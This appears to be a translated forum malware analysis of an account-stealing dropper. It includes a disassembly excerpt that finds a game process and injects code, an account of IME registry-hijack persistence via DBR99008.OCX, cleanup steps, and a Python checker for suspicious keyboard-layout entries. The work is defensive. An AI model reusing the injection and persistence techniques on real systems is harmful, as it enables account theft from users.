100042ED C645 FC 74 mov byte ptr [ebp-4], 74
100042F1 FFD6 call esi
100042F3 8B3D 14310010 mov edi, dword ptr [<&KERNEL32.GetPr>; kernel32.GetProcAddress
100042F9 50 push eax
100042FA FFD7 call edi
100042FC 83E8 03 sub eax, 3
100042FF A3 C4110010 mov dword ptr [100011C4], eax
10004304 8D45 E0 lea eax, dword ptr [ebp-20]
10004307 50 push eax
10004308 53 push ebx
10004309 FFD6 call esi
1000430B 50 push eax
1000430C FFD7 call edi
1000430E 48 dec eax
1000430F 48 dec eax
10004310 A3 C8110010 mov dword ptr [100011C8], eax
10004315 8D45 F0 lea eax, dword ptr [ebp-10]
10004318 50 push eax
10004319 53 push ebx
1000431A FFD6 call esi
1000431C 50 push eax
1000431D FFD7 call edi
1000431F 83E8 03 sub eax, 3
10004322 33F6 xor esi, esi
10004324 A3 CC110010 mov dword ptr [100011CC], eax
10004329 A1 C4110010 mov eax, dword ptr [100011C4]
1000432E 3BC6 cmp eax, esi
10004330 74 09 je short 1000433B
10004332 56 push esi
10004333 6A 02 push 2
10004335 FFD0 call eax
10004337 8BF8 mov edi, eax
10004339 EB 03 jmp short 1000433E
1000433B 8B7D 08 mov edi, dword ptr [ebp+8]
1000433E 83FF FF cmp edi, -1
10004341 75 04 jnz short 10004347
10004343 33C0 xor eax, eax
10004345 EB 73 jmp short 100043BA
10004347 8D85 98FEFFFF lea eax, dword ptr [ebp-168]
1000434D C785 98FEFFFF 2>mov dword ptr [ebp-168], 128
10004357 50 push eax
10004358 57 push edi
10004359 FF15 C8110010 call dword ptr [100011C8] ; kernel32.7C864F53
1000435F 85C0 test eax, eax
10004361 74 4E je short 100043B1
10004363 8D85 BCFEFFFF lea eax, dword ptr [ebp-144]
10004369 50 push eax
1000436A FF75 08 push dword ptr [ebp+8] ; check whether ldjgame.exe is among the running processes
1000436D FF15 9C310010 call dword ptr [<&MSVCRT._stricmp>] ; msvcrt._stricmp
10004373 59 pop ecx
10004374 85C0 test eax, eax
10004376 59 pop ecx
10004377 75 23 jnz short 1000439C
10004379 FFB5 A0FEFFFF push dword ptr [ebp-160]
1000437F E8 80FDFFFF call 10004104
10004384 85C0 test eax, eax
10004386 59 pop ecx
10004387 75 10 jnz short 10004399
10004389 FF75 0C push dword ptr [ebp+C]
1000438C FFB5 A0FEFFFF push dword ptr [ebp-160]
10004392 E8 B8050000 call 1000494F ; performs the injection
10004397 59 pop ecx
10004398 59 pop ecx
10004399 FF45 C0 inc dword ptr [ebp-40]
1000439C 8D85 98FEFFFF lea eax, dword ptr [ebp-168]
100043A2 50 push eax
100043A3 57 push edi
100043A4 FF15 CC110010 call dword ptr [100011CC] ; kernel32.7C8650C5
100043AA 85C0 test eax, eax
100043AC ^ 75 B5 jnz short 10004363
100043AE 8B75 C0 mov esi, dword ptr [ebp-40]
100043B1 57 push edi
100043B2 FF15 30310010 call dword ptr [<&KERNEL32.CloseHandl>; kernel32.CloseHandle
100043B8 8BC6 mov eax, esi
100043BA 5F pop edi
100043BB 5E pop esi
100043BC 5B pop ebx
100043BD C9 leave
100043BE C3 retn



To summarize: the dropper releases two ocx files and injects them into explorer.exe; it runs the two ocx files by creating the process gbvgbv31.exe.

dbr99008.ocx mainly modifies the input-method registry entries so that it becomes associated with the input method.

dbr31004.ocx is the one that does the real damage, stealing accounts; it mainly hijacks the Sogou input method to get itself injected into processes.

To clean up, use XueTr to end the dbr99008.ocx and dbr31004.ocx threads inside explorer.exe, then delete the files; gbvgbv31 can be deleted as well without side effects.

After that, delete the registry keys:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_CURRENT_USER\Keyboard Layout\Preload]
2 = "E0200804"
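The keys above are the persistence point: the `Keyboard Layouts\E0200804` entry names DBR99008.OCX as its IME file, and the `Preload` slot 2 makes the layout load with every logon. As an added check, not part of the original post or its removal tool, the Python helper below parses a registry export in the form shown above (it also accepts the `"Name"="Value"` lines that `reg export` produces) and reports keyboard-layout entries whose `Ime File` is not a `.ime` module, together with the Preload slots that reference them. The sample text embedded in it is constructed from the listing above plus one benign Microsoft Pinyin entry and a plain US layout; treating any non-`.ime` IME file as suspicious is a heuristic assumption, not something the post states.

```python
import re

_SECTION = re.compile(r"^\[(.+)\]$")
# Accepts both the simplified 'Name = "Value"' lines shown in the post and
# the '"Name"="Value"' form produced by `reg export`.
_VALUE = re.compile(r'^"?([^"=]+?)"?\s*=\s*"(.*)"\s*$')


def parse_reg_listing(text):
    """Map each registry key path to a dict of its string values."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _SECTION.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = _VALUE.match(line)
        if m and current is not None:
            keys[current][m.group(1).strip()] = m.group(2)
    return keys


def find_ime_hijack(text):
    """Flag keyboard-layout entries whose IME file is not a *.ime module and
    report which Preload slots load them (i.e. which ones start at logon).

    Heuristic assumption: a legitimate 'Ime File' ends in .ime; anything else
    (here the .OCX dropped by ldj.exe) is treated as suspicious.
    """
    keys = parse_reg_listing(text)
    suspicious = {}  # layout id -> {"ime_file", "keys", "preload_slots"}
    for key, values in keys.items():
        if "\\control\\keyboard layouts\\" not in key.lower():
            continue
        ime = values.get("Ime File", "")
        if ime and not ime.lower().endswith(".ime"):
            layout = key.rsplit("\\", 1)[1].upper()
            rec = suspicious.setdefault(
                layout, {"ime_file": ime, "keys": [], "preload_slots": []})
            rec["keys"].append(key)
    # Cross-reference the per-user Preload list so the report says whether the
    # hijacked layout is actually loaded at logon.
    for key, values in keys.items():
        if not key.lower().endswith("\\keyboard layout\\preload"):
            continue
        for slot, layout in values.items():
            if layout.upper() in suspicious:
                suspicious[layout.upper()]["preload_slots"].append(slot)
    return suspicious


# Constructed sample: the entries listed in the post, plus a benign Microsoft
# Pinyin layout (E0010804 / PINTLGNT.IME) and a plain US layout in Preload
# slot 1 so that the check has something it must not flag.
SAMPLE_REG = r"""
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0010804]
"Ime File"="PINTLGNT.IME"
"Layout File"="kbdus.dll"
[HKEY_CURRENT_USER\Keyboard Layout\Preload]
1 = "00000804"
2 = "E0200804"
"""

if __name__ == "__main__":
    for layout, rec in find_ime_hijack(SAMPLE_REG).items():
        print(layout, rec["ime_file"], "preload slots:", rec["preload_slots"])
        for k in rec["keys"]:
            print("   ", k)
```

On the sample this reports only E0200804 (DBR99008.OCX, present under both ControlSet001 and CurrentControlSet, loaded through Preload slot 2), which is exactly the set of keys and the Preload value the cleanup steps above tell you to remove; the E0010804 entry and slot 1 are left alone.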

The treatment of dbr31004.ocx here is very rough; I had analysed it in detail originally, but in a fit of enthusiasm I cleared out the UDD files and everything was gone.
Sigh, all the records from the first pass of analysis were lost, so this was written from memory; tragic.
As for the dropper mutating after execution, which I mentioned above: I looked at the mutated dropper again; it starts with a jmp,
then writes the PE header to 004126E0 again via WriteProcessMemoryA and goes back to restore the 5 bytes!
I have no idea what is going on there....
I wrote a bit of code, mostly from Baidu; a noob who can't program really can't take it, tragic!
It mainly unloads the dll files injected into explorer.exe and modifies part of the registry; I'm not familiar with that function, so I didn't dare write it carelessly.
